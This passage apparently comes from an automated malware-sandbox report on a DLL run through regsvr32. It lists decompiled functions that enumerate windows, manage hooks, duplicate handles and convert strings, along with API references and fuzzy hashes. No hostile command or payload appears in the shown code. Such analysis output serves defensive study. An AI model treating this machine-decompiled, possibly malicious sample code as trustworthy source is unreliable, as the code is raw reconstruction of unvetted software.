Instruction Fuzzy Hash: 9C11A7A9600211AFF204DB54AC85FAF739CFB89754F404425FD2482140E678A94A8BE7

Uniqueness

Uniqueness Score: -1.00%

Function 1002AF71 Relevance: 6.1, APIs: 4, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002AF71(void* __eax, void* __ebx, void* __edx, struct HWND__* _a12, intOrPtr _a16) {
				struct HWND__* _t17;
				struct HWND__* _t21;
				intOrPtr _t25;
				void* _t31;

				_t1 = __ebx + 0x56;
				 *_t1 =  *((intOrPtr*)(__ebx + 0x56)) + __edx;
				if( *_t1 != 0) {
					_t21 = GetWindow(_a12, 5);
					__eflags = _t21;
					if(__eflags != 0) {
						_t25 = _a16;
						do {
							E1002AEC0(__eflags, _t21, _t25, 0);
							_t31 = _t31 + 0xc;
							_t17 = GetWindow(_t21, 5);
							__eflags = _t17;
							while(__eflags != 0) {
								E1002AEC0(__eflags, _t17, _t25, _t21);
								_t31 = _t31 + 0xc;
								_t17 = GetWindow(_t17, 2);
								__eflags = _t17;
							}
							_t21 = GetWindow(_t21, 2);
							__eflags = _t21;
						} while (__eflags != 0);
					}
					return 1;
				} else {
					return 0;
				}
			}

0x1002af76
0x1002af76
0x1002af7b
0x1002af95
0x1002af97
0x1002af99
0x1002af9b
0x1002afa0
0x1002afa4
0x1002afa9
0x1002afb1
0x1002afb3
0x1002afb5
0x1002afba
0x1002afbf
0x1002afc7
0x1002afc9
0x1002afc9
0x1002afd2
0x1002afd4
0x1002afd4
0x1002afa0
0x1002afe1
0x1002af7d
0x1002af83
0x1002af83

APIs

GetWindow.USER32(?,00000005), ref: 1002AF93
GetWindow.USER32(00000000,00000005), ref: 1002AFAF
GetWindow.USER32(00000000,00000002), ref: 1002AFC5
GetWindow.USER32(00000000,00000002), ref: 1002AFD0

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 4178aaee311e63a2a1e1273c71dcb7ed9e94497318ea643cfe263ae0b3390d7d
Instruction ID: 33fb93db21cc56fbdb10a0cc5faa5657b576d13f8376f263b5316712e8372420
Opcode Fuzzy Hash: 4178aaee311e63a2a1e1273c71dcb7ed9e94497318ea643cfe263ae0b3390d7d
Instruction Fuzzy Hash: 49F0FFA730534623D252E1AA3C86F6BBB9DCBD6AA1F82003AF204A6182ED59D8454265

Uniqueness

Uniqueness Score: -1.00%

Function 1002A4A0 Relevance: 6.1, APIs: 4, Instructions: 53
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002A4A0(int _a4, int _a8, long _a12) {
				void* _v4;
				signed char _t25;
				long _t31;
				long _t32;

				_t32 = _a12;
				_t31 = CallNextHookEx( *0x100952f0, _a4, _a8, _t32);
				if( *(_t32 + 0xc) ==  *0x100952ec) {
					UnhookWindowsHookEx( *0x100952f0);
					if( *0x10096d40 < 0x35f) {
						L3:
						_v4 = 1;
					} else {
						_t25 = GetWindowLongA( *(_t32 + 0xc), 0xfffffff0);
						_v4 = 0;
						if((_t25 & 0x00000004) == 0) {
							goto L3;
						}
					}
					SendMessageA( *(_t32 + 0xc), 0x11f0, 0,  &_v4);
					if(_v4 != 0) {
						E1002A3B0( *(_t32 + 0xc),  *0x100952f4);
					}
					 *0x100952f0 = 0;
					 *0x100952f4 = 0;
					 *0x100952ec = 0;
				}
				return _t31;
			}

0x1002a4ac
0x1002a4c1
0x1002a4cc
0x1002a4d4
0x1002a4e3
0x1002a4fd
0x1002a4fd
0x1002a4e5
0x1002a4eb
0x1002a4f1
0x1002a4fb
0x00000000
0x00000000
0x1002a4fb
0x1002a515
0x1002a520
0x1002a52c
0x1002a531
0x1002a536
0x1002a53b
0x1002a540
0x1002a540
0x1002a54c

APIs

CallNextHookEx.USER32 ref: 1002A4BB
UnhookWindowsHookEx.USER32 ref: 1002A4D4
GetWindowLongA.USER32(?,000000F0), ref: 1002A4EB
SendMessageA.USER32 ref: 1002A515

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Hook$CallLongMessageNextSendUnhookWindowWindows
String ID:
API String ID: 4187046592-0
Opcode ID: a7a8b418052f4f2fcdb6cc7dc6315dc9797bc1295413ac5dae42e1926567b983
Instruction ID: d620f4be692c30fd0212b672685dfdde9170af9858f51f15d85d9600be1d9163
Opcode Fuzzy Hash: a7a8b418052f4f2fcdb6cc7dc6315dc9797bc1295413ac5dae42e1926567b983
Instruction Fuzzy Hash: 95111975600222AFE308CB59EC88E5B77F9FB89355F40851EF94A82260DB71E884CB51

Uniqueness

Uniqueness Score: -1.00%

Function 100482C0 Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E100482C0(void* __ecx, void* __esi) {
				void* _v8;
				void* _t10;
				void* _t22;
				intOrPtr* _t29;
				void* _t31;

				_t31 = __esi;
				_push(__ecx);
				_t22 = __ecx;
				if(E10045FEF(0x10) == 0) {
					_t29 = 0;
				} else {
					_t29 = E100481B9(_t8, 0xffffffff);
				}
				_push(_t31);
				_t10 = GetCurrentProcess();
				if(DuplicateHandle(GetCurrentProcess(),  *(_t22 + 4), _t10,  &_v8, 0, 0, 2) == 0) {
					if(_t29 != 0) {
						 *((intOrPtr*)( *_t29 + 4))(1);
					}
					E10048CC6(GetLastError(), 0);
				}
				 *((intOrPtr*)(_t29 + 4)) = _v8;
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t22 + 8));
				return _t29;
			}

0x100482c0
0x100482c3
0x100482c6
0x100482d2
0x100482e1
0x100482d4
0x100482dd
0x100482dd
0x100482e3
0x100482f4
0x10048306
0x1004830a
0x10048312
0x10048312
0x1004831e
0x1004831e
0x10048326
0x1004832c
0x10048334

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 100482F4
GetCurrentProcess.KERNEL32(?,00000000), ref: 100482FA
DuplicateHandle.KERNEL32 ref: 100482FD
GetLastError.KERNEL32(00000000), ref: 10048317

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast
String ID:
API String ID: 3907606552-0
Opcode ID: 2caa386451a60b1a6ace1d4bf39b1b27948b36819747db911b6541720a1cfc21
Instruction ID: a81d8b08f016208b5456c692bbafe0ffdb6708365bd1086cca245be2a64507e8
Opcode Fuzzy Hash: 2caa386451a60b1a6ace1d4bf39b1b27948b36819747db911b6541720a1cfc21
Instruction Fuzzy Hash: FB017175700215BFEB00DBA9CD8AF5E7AADEB84751F204526F918DB291EAA0ED00C764

Uniqueness

Uniqueness Score: -1.00%

Function 1002A980 Relevance: 6.1, APIs: 4, Instructions: 52
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002A980() {
				signed int _t18;
				intOrPtr _t20;
				void* _t24;
				long _t26;
				void* _t29;
				void* _t32;
				signed int _t34;
				void* _t35;
				void* _t36;
				void* _t40;
				void* _t41;
				void* _t42;

				_t34 = 0;
				_t26 = GetCurrentThreadId();
				EnterCriticalSection(0x10096ac0);
				_t36 =  *0x10096d7c - _t34; // 0x0
				if(_t36 > 0) {
					do {
						_t18 = _t34 * 4;
						_t32 = _t18 + _t18 * 4;
						if( *((intOrPtr*)(_t18 + 0x10096d84 + _t18 * 4)) == _t26) {
							_t20 =  *((intOrPtr*)(_t32 + 0x10096d8c)) - 1;
							 *((intOrPtr*)(_t32 + 0x10096d8c)) = _t20;
							if(_t20 == 0 ||  *(_t32 + 0x10096d80) ==  *((intOrPtr*)(_t35 + 0x14))) {
								UnhookWindowsHookEx( *(_t32 + 0x10096d88));
								 *0x10096d7c =  *0x10096d7c - 1;
								_t40 = _t34 -  *0x10096d7c; // 0x0
								if(_t40 < 0) {
									_t29 = _t32 + 0x10096d80;
									do {
										_t34 = _t34 + 1;
										_t24 = memcpy(_t29, _t29 + 0x14, 5 << 2);
										_t35 = _t35 + 0xc;
										_t29 = _t24;
										_t41 = _t34 -  *0x10096d7c; // 0x0
									} while (_t41 < 0);
								}
							}
						}
						_t34 = _t34 + 1;
						_t42 = _t34 -  *0x10096d7c; // 0x0
					} while (_t42 < 0);
				}
				 *0x10096d24 =  *0x10096d24 - 1;
				LeaveCriticalSection(0x10096ac0);
				if( *0x10096d24 == 0) {
					E1002B690();
				}
				return 1;
			}

0x1002a984
0x1002a98c
0x1002a993
0x1002a999
0x1002a99f
0x1002a9a1
0x1002a9a1
0x1002a9af
0x1002a9b2
0x1002a9ba
0x1002a9bb
0x1002a9c1
0x1002a9d6
0x1002a9dc
0x1002a9e2
0x1002a9e8
0x1002a9ea
0x1002a9f0
0x1002a9fa
0x1002a9fb
0x1002a9fb
0x1002a9fd
0x1002a9ff
0x1002a9ff
0x1002a9f0
0x1002a9e8
0x1002a9c1
0x1002aa07
0x1002aa08
0x1002aa08
0x1002a9a1
0x1002aa15
0x1002aa1b
0x1002aa28
0x1002aa2a
0x1002aa2a
0x1002aa38

APIs

GetCurrentThreadId.KERNEL32 ref: 1002A986
EnterCriticalSection.KERNEL32(10096AC0), ref: 1002A993
UnhookWindowsHookEx.USER32 ref: 1002A9D6
LeaveCriticalSection.KERNEL32(10096AC0), ref: 1002AA1B

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
String ID:
API String ID: 1197249173-0
Opcode ID: 92608bfad085b5845d4b9c3ceaed4b999cb75809eecbe9dd60cb583d885fee56
Instruction ID: b1259eb2169c16947b092208cac97f160e1fe0099e43b1c84080d630fc72cc76
Opcode Fuzzy Hash: 92608bfad085b5845d4b9c3ceaed4b999cb75809eecbe9dd60cb583d885fee56
Instruction Fuzzy Hash: E9119E31A02A59CFE314DF24DCC8A6633B4FB4D345B81442BE52AC3021DB366888CB52

Uniqueness

Uniqueness Score: -1.00%

Function 1003B8A9 Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1003B8A9(void* __ecx, struct tagPOINT* _a8) {
				struct tagPOINT _v12;
				struct tagPOINT* _t8;
				struct HWND__* _t9;
				int _t14;
				long _t18;
				struct HWND__* _t21;
				struct HWND__* _t22;
				struct HWND__* _t24;

				_t8 = _a8;
				_v12.x = _t8->x;
				_t18 = _t8->y;
				_push(_t18);
				_v12.y = _t18;
				_t9 = WindowFromPoint( *_t8);
				_t24 = _t9;
				if(_t24 != 0) {
					_t21 = GetParent(_t24);
					if(_t21 == 0 || L1004E321(_t21, 2) == 0) {
						ScreenToClient(_t24,  &_v12);
						_t22 = L1004E396(_t24, _v12.x, _v12.y);
						if(_t22 == 0) {
							L6:
							_t9 = _t24;
						} else {
							_t14 = IsWindowEnabled(_t22);
							_t9 = _t22;
							if(_t14 != 0) {
								goto L6;
							}
						}
					} else {
						_t9 = _t21;
					}
				}
				return _t9;
			}

0x1003b8ae
0x1003b8b5
0x1003b8b8
0x1003b8bb
0x1003b8bc
0x1003b8c1
0x1003b8c7
0x1003b8cb
0x1003b8d4
0x1003b8d8
0x1003b8ef
0x1003b901
0x1003b905
0x1003b914
0x1003b914
0x1003b907
0x1003b908
0x1003b910
0x1003b912
0x00000000
0x00000000
0x1003b912
0x1003b8e6
0x1003b8e6
0x1003b8e6
0x1003b8d8
0x1003b919

APIs

WindowFromPoint.USER32 ref: 1003B8C1
GetParent.USER32(00000000), ref: 1003B8CE
ScreenToClient.USER32(00000000,?), ref: 1003B8EF
IsWindowEnabled.USER32(00000000), ref: 1003B908

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$ClientEnabledFromParentPointScreen
String ID:
API String ID: 1871804413-0
Opcode ID: b55203b099d41157309d6175a156d3c679b23e139fad1081a2f3952870db4a9c
Instruction ID: 772382de13b5f1366dbf52b242da04e7cabb15c1998ccaa2358bd000f03ded38
Opcode Fuzzy Hash: b55203b099d41157309d6175a156d3c679b23e139fad1081a2f3952870db4a9c
Instruction Fuzzy Hash: F8017136600912AF9707DB9C8C44DAE7BA9FF89685F114169F605D7220EB30DE01D760

Uniqueness

Uniqueness Score: -1.00%

Function 10017036 Relevance: 6.0, APIs: 4, Instructions: 49
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E10017036(intOrPtr __ecx, int _a4) {
				intOrPtr _v8;
				void* _v20;
				int _t7;
				void* _t16;
				char* _t17;
				void* _t20;
				short* _t21;
				void* _t23;
				intOrPtr _t24;
				int _t26;
				short* _t28;

				_t19 = __ecx;
				_t24 = __ecx;
				_v8 = __ecx;
				__imp__#9(__ecx, _t20, _t23, _t16, __ecx);
				_t7 = _a4;
				 *((short*)(__ecx)) = 8;
				_t17 =  *_t7;
				if(_t17 != 0) {
					_t26 = lstrlenA(_t17) + 1;
					E1001B2B0(_t26 + _t26 + 0x00000003 & 0x000000fc, _t19);
					_t21 = _t28;
					 *_t21 = 0;
					_t7 = MultiByteToWideChar(0, 0, _t17, 0xffffffff, _t21, _t26);
					_t24 = _v8;
				} else {
					_t21 = 0;
				}
				__imp__#2(_t21);
				 *(_t24 + 8) = _t7;
				if(_t7 == 0) {
					E1003743B(_t19);
				}
				return _t24;
			}

0x10017036
0x1001703c
0x10017040
0x10017043
0x10017049
0x1001704c
0x10017051
0x10017055
0x10017064
0x1001706d
0x10017072
0x1001707d
0x10017080
0x10017086
0x10017057
0x10017057
0x10017057
0x1001708a
0x10017092
0x10017095
0x10017097
0x10017097
0x100170a5

APIs

VariantClear.OLEAUT32 ref: 10017043
lstrlenA.KERNEL32 ref: 1001705C
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 10017080
SysAllocString.OLEAUT32 ref: 1001708A

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocByteCharClearMultiStringVariantWidelstrlen
String ID:
API String ID: 3257503732-0
Opcode ID: e384507e03d481aaf5a0615681a24d3345efacb52b27684d06c3b1e38d0739c5
Instruction ID: 512f41c2ae431939a0621cf4086e9886478a8bd67282fd59947fff9ce0cf4e0d
Opcode Fuzzy Hash: e384507e03d481aaf5a0615681a24d3345efacb52b27684d06c3b1e38d0739c5
Instruction Fuzzy Hash: 9E018F76510226ABA710DB69CC8585F7BACFF4A660310012AF909D7210EB70AD408BA1

Uniqueness

Uniqueness Score: -1.00%

Function 10043849 Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10043849(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __ebp;
				struct HWND__* _t10;
				void* _t12;
				void* _t15;
				struct HWND__* _t17;
				struct HWND__* _t18;
				void* _t19;

				_t15 = __ecx;
				_t17 = GetDlgItem(_a4, _a8);
				if(_t17 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t18 = _t10;
						if(_t18 == 0) {
							break;
						}
						_t12 = E10043849(_t15, _t18, _a8, _a12);
						if(_t12 == 0) {
							_t10 = GetWindow(_t18, 2);
							continue;
						}
						goto L11;
					}
					return 0;
				} else {
					if(GetTopWindow(_t17) == 0) {
						L3:
						_push(_t17);
						if(_a12 == 0) {
							return E10041F78(_t19);
						}
						_t12 = E10041F9F();
						if(_t12 == 0) {
							goto L6;
						}
					} else {
						_t12 = E10043849(_t15, _t17, _a8, _a12);
						if(_t12 == 0) {
							goto L3;
						}
					}
				}
				L11:
				return _t12;
			}

0x10043849
0x10043860
0x10043864
0x10043894
0x10043897
0x10043899
0x10043899
0x1004389d
0x00000000
0x00000000
0x100438a6
0x100438ad
0x100438b2
0x00000000
0x100438b2
0x00000000
0x100438ad
0x00000000
0x10043866
0x1004386b
0x1004387d
0x10043881
0x10043882
0x00000000
0x10043884
0x1004388b
0x10043892
0x00000000
0x00000000
0x1004386d
0x10043874
0x1004387b
0x00000000
0x00000000
0x1004387b
0x1004386b
0x100438bf
0x100438bf

APIs

GetDlgItem.USER32(?,?), ref: 10043854
GetTopWindow.USER32(00000000), ref: 10043867
GetTopWindow.USER32(?), ref: 10043897
GetWindow.USER32(00000000,00000002), ref: 100438B2

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
